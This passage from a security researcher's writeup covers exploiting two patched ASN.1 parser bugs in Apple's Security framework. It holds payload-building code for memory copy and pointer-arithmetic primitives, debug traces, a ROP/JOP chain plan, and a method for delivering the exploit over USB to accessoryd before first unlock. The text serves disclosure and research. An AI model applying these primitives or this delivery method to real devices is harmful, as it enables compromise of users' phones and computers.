replace `top->their_pool` with our own `PORTArenaPool`. Once we have that,
all subsequent allocations in `their_pool` will be controlled by us. We can
even chain multiple Arenas in `PORTArenaPool` and, if sized correctly, they
will perform different controlled writes with little to no effort. First,
we replace `their_pool`:

REP_BITSTRING(0, 5, 'f');
REP_BITSTRING(0, FILLER_LEN + 2 * 8, 'f'); // leave the pointer dangling over 'dest'
CONS_BITSTRING(3 + 8 + 3 + 8);
PUSH8(0x4b4b4b4b4b4b4b42); // 'dest' -> &SecAsn1Item = { 8, state#1->top }
PUSH8(0x4b4b4b4b4b4b4b48); // &PORTArenaPool

0x4b4b4b4b4b4b4b42 is the address of the fake SecAsn1Item, consisting of a
+8 byte offset and `top` as base.

0x4b4b4b4b4b4b4b48 is our full PORTArenaPool replacement for `their_pool`,
consisting of a new Arena: [0x4141414141414160 .. 0x4141414141414170]. It
represents the copyout destination. This replacement step must be performed
once, followed by the actual copyout:

// cause a state object allocation with known parent
REP_BITSTRING(0, 5, 'g');
REP_BITSTRING(0, FILLER_LEN + 2 * 8, 'g'); // leave the pointer dangling over 'dest'
// switch to 'afterConstructedString' and trigger a copyout from subitem via sec_asn1d_concat_substrings
PUSH8(0x4b4b4b4b4b4b4b4b); // dest: any { 0, NULL }
PUSH8(0ULL); // our_mark
PUSH8(0x4b4b4b4b4b4b4b4c); // parent: previous object
PUSH8(0ULL); // child
PUSH8(13ULL); // place: afterConstructedString
PUSH8(0xdfULL); // check_tag_mask
PUSH8(3ULL); // found_tag_number
PUSH8(3ULL); // expect_tag_number
PUSH8(3ULL); // underlying_kind
PUSH8(1ULL + 112); // contents_length
PUSH8(1ULL + 112); // pending: +1
PUSH8(3ULL); // consumed
PUSH4(11); // depth
PUSH4(0); // bit_string_unused_bits
PUSH8(0x4b4b4b4b4b4b4b4d); // subitems_head: &subitem

0x4b4b4b4b4b4b4b4b must point to a temporary empty `dest`. This is needed
to dodge some assertions. Not quite mandatory, because the assertions are
missing from the Release binaries, I'm just being pedantic.

0x4b4b4b4b4b4b4b4c must be the parent of the object we are manipulating. It
is placed at a known address.

0x4b4b4b4b4b4b4b4d is the subitem (or head of a subitem chain) which points
to the source data.

The net effect of the code above is:
memcpy(0x4141414141414160, 0x4b4b4b4b4b4b4b41, 8);

If multiple copyouts are desired, we can chain the subitems and also chain
the initial PORTArenaPool to other PLArena structures.

In contrast to the previous chapters' primitives, this allows us to copy
whatever data into the destination, not merely scalar values. And we did it
without overly complicated contraptions to pivot the input buffer. Looking
back at the old code I cannot stop wondering what the fuck was I thinking
back then. It is a total garbage.

-- 4.2.1 - Copyin

The copyin is a bit different. It represents the ability to copy data from
any arbitrary address into local scratch space. This can be achieved with
`sec_asn1d_prepare_for_contents`. We can't exactly tell where to copy to,
but this is just a minor inconvenience, because said data is copied into a
new `our_pool` allocation, which is inside the scratch space, hence we can
calculate where it will end up:

if (item) {
item->Data = (unsigned char*)sec_asn1d_zalloc(poolp, alloc_len);

len = 0;
for (subitem = state->subitems_head;
subitem != NULL; subitem = subitem->next) {
PORT_Memcpy (item->Data + len, subitem->data, subitem->len);
len += subitem->len;
item->Length = len;

Here's how to trigger it:

// cause a state object allocation with known parent
REP_BITSTRING(0, 5, 'i');
REP_BITSTRING(0, FILLER_LEN + 2 * 8, 'i'); // leave the pointer dangling over 'dest'
// switch back to 'afterLength' and trigger a copyin from subitem via sec_asn1d_prepare_for_contents
PUSH8(0x4b4b4b4b4b4b4b4f); // dest: any { 0, NULL }
PUSH8(0ULL); // our_mark
PUSH8(0x4b4b4b4b4b4b4b50); // parent: previous object
PUSH8(0ULL); // child
PUSH8(5ULL); // place: afterLength
PUSH8(0xdfULL); // check_tag_mask
PUSH8(3ULL); // found_tag_number
PUSH8(3ULL); // expect_tag_number
PUSH8(0x400ULL); // underlying_kind: SEC_ASN1_ANY
PUSH8(0ULL); // contents_length: 0
PUSH8(1ULL + 112); // pending: +1
PUSH8(3ULL); // consumed
PUSH4(11); // depth
PUSH4(0); // bit_string_unused_bits
PUSH8(0x4b4b4b4b4b4b4b47); // subitems_head: &subitem

0x4b4b4b4b4b4b4b4f must point to a temporary empty `dest`. This is needed
to make sure the copyin is done at the next available `our_pool` address,
which can be calculated and therefore it is considered known.

0x4b4b4b4b4b4b4b50 must be the parent of the object we are manipulating. It
is placed at a known address.

0x4b4b4b4b4b4b4b47 is the subitem (or head of a subitem chain) which points
to the address to read from. The data will be placed at the next available
address in the scratch space.

The net effect of the code above is:
memcpy(next_alloc(our_pool), 0x4545454545454545, 8);

And since `our_pool` is pinned to the scratch space, we can calculate where
the destination will be.

-- 4.2.2 - Arithmetic

Arithmetic represents the ability to do some sort of addition/subtraction.
Since we want to avoid a multi-step exploit and perform everything in one
go, we need to work out some shared cache addresses. For example, if we'd
want to find the address of `vm_remap` function, we can simply execute the
following equivalent operation:

vm_remap = &kSecAsn1BitStringTemplate + addend;

The addend above is constant for a given shared cache and can be calculated
beforehand. The addition itself is done in `sec_asn1d_next_substring`. In
case it is not obvious, the relevant code is this:

state->consumed += child_consumed;

The operation is done by using two discarded state objects. First make sure
`child->consumed` holds the addend (this is a matter of a simple write) and
then use a copyout to set `state->consumed` to `kSecAsn1BitStringTemplate`.
After the operation, `state->consumed` holds the result of the addition.

// SecAsn1Item
PUSH8(0ULL); // Length
PUSH8(0x4b4b4b4b4b4b4b41); // Data: &state#1->our_mark

// state#1 (promptly discarded)
CONS_BITSTRING(3 + 2); // Vader
// state#2 (promptly discarded)

// Use SecAsn1Item to prepare state#1 and state#2.

REP_BITSTRING(0, 5, 'e');
REP_BITSTRING(0, FILLER_LEN + 2 * 8, 'e'); // leave the pointer dangling over 'dest'
CONS_BITSTRING(3 + 8 + 4 + 232);
PUSH8(0x4b4b4b4b4b4b4b49); // 'dest' -> &SecAsn1Item = { 0, &state#1->our_mark }
PUSH8(-1ULL); // our_mark: -1
PUSH8(0x4b4b4b4b4b4b4b4a); // parent: where we want to resume
PUSH8(0x4b4b4b4b4b4b4b4b); // child: &state#2
PUSH8(8ULL); // place: duringConstructedString
PUSH8(0xdfULL); // check_tag_mask
PUSH8(3ULL); // found_tag_number
PUSH8(3ULL); // expect_tag_number
PUSH8(3ULL); // underlying_kind
PUSH8(1ULL); // contents_length
PUSH8(0x4242424242424242); // pending: ADDEND
PUSH8(0ULL); // consumed: POINTER
PUSH8(0x4b4b4b4b4b4b4b51); // depth...: serve as arg = &string
PUSHR(0x80, 0); // (bleed over into state#2)
PUSH8(0x4242424242424242); // consumed: ADDEND

// Insert here copyout of any state->theTemplate to &state#1->consumed,
// where the POINTER is expected to be.
// And here follows the addition per se:

// cause a state object allocation with known parent
REP_BITSTRING(0, 5, 'h');
REP_BITSTRING(0, FILLER_LEN + 4 * 8, 'h'); // leave the pointer dangling over 'parent'
// switch to 'duringConstructedString' and trigger addition via sec_asn1d_next_substring
PUSH8(0x4b4b4b4b4b4b4b4e); // parent: state#1

We can chain multiple state#1/state#2 pairs to perform multiple additions
in one go, with one addend for each pair. The last object used for addition
must have its parent pointing back to the object we left off.

v |
+---------------------+ +--------------------+ |
| discarded obj |-->| discarded obj | |
| state#1[n] = parent | | state#2[n] = child | |
+---------------------+ +--------------------+ |
| ^ | |
| +- addition#n -+ |
~ ~
| |
v |
+---------------------+ +--------------------+ |
| discarded obj |-->| discarded obj | |
| state#1[1] = parent | | state#2[1] = child | |
| +---------------------+ +--------------------+ |
| | ^ | |
| | +- addition#1 -+ |
v v |
+-------------+ |
| parent |------+ |
+-------------+ | |
| ^ v |
| | +------------+ |
| +--X--|YOU ARE HERE|-------------------------------+
| +------------+

Here we see state 0x102b627f0 transitioning to 102b62198 which performs the
addition, and then transitioning back to 0x102b626c8 and resuming execution

sec_asn1d_parse_leaf: memcpy(0x102b62758 + 5 = 0x102b6275d, "6868686868686868", 179)
sec_asn1d_parse_leaf: pre-existing value = 0x867b806a20000000
STATE transition 0x102b626c8 -> 0x7f867b80b620
STATE transition 0x7f867b80b620 -> 0x102b626c8
sec_asn1d_push_state:430: zalloc(144) -> 0x102b627f0 in arena o_pool/0x0 (left -1)
STATE transition 0x102b626c8 -> 0x102b627f0
sec_asn1d_parse_leaf: len=2401, @1953
sec_asn1d_parse_leaf: item = BIT_STRING, item->len = 1472, len = 8
state = 0x102b627f0
top = 0x7f867b806a20
theTemplate = 0x102b7b2e0
dest = 0x7f867b809620
our_mark = 0x0
parent = 0x102b626c8
contents_length = 9
pending = 8
consumed = 3
depth = 12
allocate = 0
indefinite = 0
sec_asn1d_parse_leaf: memcpy(0x102b62758 + 184 = 0x102b62810, "102b62198", 8)
sec_asn1d_parse_leaf: pre-existing value = 0x102b626c8
STATE transition 0x102b627f0 -> 0x102b62198
STATE transition 0x102b62198 -> 0x102b626c8
STATE transition 0x102b626c8 -> 0x7f867b80b620
STATE transition 0x7f867b80b620 -> 0x7f867b809328
STATE transition 0x7f867b809328 -> 0x7f867b80b620
STATE transition 0x7f867b80b620 -> 0x7f867b809328
STATE transition 0x7f867b809328 -> 0x7f867b80b620

-- 4.3 - Assembling the pieces

The last missing bit is achieving code execution. This can be done the same
way we did in the old exploit, using `top->filter_proc(top->filter_arg)`.
Bypassing PAC is considered a security bug in its own right, this writeup
is meant to illustrate strictly the ASN.1 bugs. As a consequence, defeating
other mitigations than ASLR is left as an exercise to the reader.

Now that we have all pieces, we are ready to build the exploit, using the
following strategy:
- use a number of copyouts to place a small number of template pointers in
the expected object pairs, prepared for addition;
- perform a series of pointer arithmetic to compute the respective number
of gadgets;
- use a chained copyin to assemble certain data fragments interleaved with
the aforementioned gadgets, effectively building a bootstrap ROP strip;
- copyout a JOP gadget over `top->filter_proc` and the address of said ROP
strip over `top->filter_arg`, which will pivot the stack;
- the bootstrap ROP strip does the following:
- vm_remap the shared cache at a fixed address;
- jump to stage2 relocator, which relocates the rest of stage2, using
only gadgets from the remapped cache;
- enter late stage2 which has full ROP functionality.

Of course, this is but one way of doing it. Please keep in mind that our
primitives are quite expensive in terms of bitstring space, and therefore
we aim to complete the chain with minimal effort.

Finally, we "relocate" the PKCS#7 for whichever address we believe it would
be a viable scratch space. Relocating means translating all those addresses
we know about: 0x4b4b4b4b4b4b4b... The result will be sent over USB as an
IAP2 authentication packet to accessoryd, using whatever MFi tool. Note: we
do not need a real IAP certificate, because the exploit kicks in before the
certificate is even validated and it does everything in one go.

If we miss, accessoryd will likely crash and we may need to restore the USB
connection. Then we can build another PKCS#7 (for another address) or just
keep retrying the old one. Eventually, one of them is bound to hit a usable
scratch address and succeed. Note: these daemons listening over USB are not
throttled. Also, it makes no difference if the shared cache is reslid upon
daemon restart, since we have the ability to recalculate the gadgets during
each retry.

The only thing that matters is to reach a writable scratch area we can use.
It does not matter what this area contains, and it does not have to be at a
specific address. It just has to be. Everything is computed during decoding
with the aid of the hijacked ASN.1 machinery, provided it has a little bit
of manoeuvring space.

-- 5 - Conclusions

This article has begun in Spring 2021, its main purpose was to detail the
CVE-2016-1950 exploit. But as I was writing, trying hard to remember five
years old details, I realised the exploit used two bugs: one that was fixed
and the other one (which I completely forgot about) that was still there.
I knew it was somehow exploitable on its own, so I reported it to Apple, on
16 April 2021. It was fixed in iOS 14.6 beta 3 (18F5065a) dated 10 May 2021
and it would later become CVE-2021-30737[7] of iOS 14.6 (18F72) release. It
was also backported to iOS 12.5.4 for end-of-life devices.

An interesting side-note: to my knowledge, Apple started to use Mozilla NSS
ASN.1 parser in MacOSX Panther, 2003: SecurityNssAsn1-11.tar.gz. And while
CVE-2016-1950 was inherited from the original codebase, CVE-2021-30737 was
never in Mozilla code; it seems to be an Apple-only addition. I do not know
what was the purpose of the change, perhaps they wanted to take a shortcut
for empty bitstrings for speed reasons, I guess we will never know.

Here ends our journey into the ASN.1 parser vulnerabilities. CVE-2016-1950
has been fixed in iOS 9.3 and CVE-2021-30737 was fixed in iOS 14.6, five
years later. Both bugs affected virtually all Apple products: iPhone, iPad,
Macs, etc. While the two bugs are completely unrelated, it may be that the
former can be turned into an exploit without the latter. I never tried to
do it that way. What we know now is the old bug greatly helped the newer
one -- but as we can see, CVE-2021-30737 was powerful enough to carry the
weight of a full exploit on its own.

These bugs are interesting because they can be used to mount a full attack
against daemons listening on the phone Before First Unlock over USB. This
means pretty much game over for 32bit devices, since those do not have SEP.
On 64bit devices, however, the exploit can be used as a starting point for
further exploration.

Another interesting aspect is that a sizeable part of these exploits, that
is, everything we accomplish with the bitstring is architecture agnostic,
only the bitness matters. For example, the resulting bitstrings can be
tested on x86_64 and then used on arm64. Ditto for i386 vs armv7.

Last, but not least, there are some lessons to be learned. First of all,
you should never use an Arena allocator in security sensitive contexts.
Yes, Arenas are fast, easy to implement from a programmer point of view
and they seem appealing. They can also get you pwned, because the memory
blocks are laid out in a predictable fashion. Actually, to be more blunt,
stay the fuck away from any kind of allocator with inline meta-data.

Second, BER is a hairy beast. BER parsers tend to become extremely complex
and complexity is the enemy of security. If you must handle ASN.1, use DER
whenever possible. There are examples of alloc-less DER parsers which do a
pretty good job and seem very secure when used properly, such as libDER.

Third, never ever mess with complex state machines that you do not fully
understand. All the assertions were useless, with one notable exception
(which may or may not be possible to dodge) so even if they were left in
the Release binaries, it didn't matter greatly. State machines are hard!
Human brains are great for many things, but state machines is definitely
not one of those.

-- 6 - References


-- 7 - Source code

The source code was designed to work on iPhones, but it happens to work on
macOS, too. Make sure you respect the bitness and use the correct libraries
for each of the included examples: Security-57337.20.44 for the first bug
and Security-59754.80.3 for the second one.

begin-base64 644 bitstring.tar.xz



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